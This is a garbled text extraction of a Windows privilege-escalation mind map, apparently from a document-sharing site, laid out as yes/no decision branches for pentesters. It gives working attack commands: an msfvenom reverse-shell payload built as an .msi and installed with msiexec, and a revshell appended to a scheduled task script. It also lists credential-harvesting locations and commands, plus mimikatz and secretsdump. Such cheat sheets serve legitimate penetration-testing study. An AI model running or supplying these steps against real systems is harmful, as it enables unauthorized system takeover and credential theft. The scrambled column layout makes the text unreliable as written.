Professional Documents
Culture Documents
Windows PE Mind Map
Windows PE Mind Map
Windows PE Mind Map
Mind Map
TOKEN ABUSING
NO YES
Insecure Service Is there any service that have earch the privilege you've
S
Permissions permission to change found in the internet ,follow
configs?: `accesschk.exe - the instructions.
Unquoted Services uwcqv "$username" *` (we are
SERVICE EXPLOITING looking for "SERVICE_
Weak Registry Permissions CHANGE_CONFIG" privilege)
NO YES
NO YES
NO YES
his mind map covers these
T
techniques :
Do we have any non default Create a .msi backdoor and
1 + Misconfigured Privileges
scheduled task? : `Get- transfer it to the target : `
- Token Abusing
ScheduledTask | where {$_. msfvenom -p windows/x64/
2 + Services
TaskPath -notlike "\ shell_reverse_tcp LHOST=10.
Microsoft*"} | ft TaskName, 10.10.10 LPORT=9001 -f msi -o - Service Exploits - Insecure Service Permissions
TaskPath,State` reverse.msi` - Service Exploits - Unquoted Service Path
- Service Exploits - Weak Registry Permissions
Unattend.xml - Service Exploits - Insecure Service Executables
NO YES `msiexec /quiet /qn /i C:\Path\
3 + Registry
to\revshell.msi`
Powershell history - Registry - AutoRuns
REDENTIAL
C
heck following locations ,are they exist and
C Use accesschk do we have - Registry - AlwaysInstallElevated
HARVESTING Saved Credentials did you find creds in them? : write permission on that 4 + Schedules Tasks
C:\Unattend.xml file? : `accesschk.exe / 5 + Creds in files / Harvesting Passwords from Usual Spots
IIS Configuration C:\Windows\Panther\Unattend.xml accepteula -quvw user C:\Path\
- Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml To\Scheduled\task.ps1`
- Powershell History
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml - Saved Windows Credentials
NO YES - IIS Configuration
6 + Password Dumping
Check powershell history : ` - mimikatz
type C:\Users\$User_name\ echo C:\Path\To\revshell.
`
exe >> C:\Path\To\Scheduled\ - secretsdump with SAM & SYSTEM
AppData\Roaming\Microsoft\
task.ps1` 7 + Local ports
Windows\PowerShell\
PSReadline\ConsoleHost_ 8 + Other Methods
history.txt` - Dll Hijacking
- Interestig Groups /DnsAdmins
- Insecure Gui Apps
heck if we have any saved
C
9 + Vulnerable software
credentials : `cmdkey /list`
10 + CVE & KERNEL EXPLOIT
- WES-NG
NO YES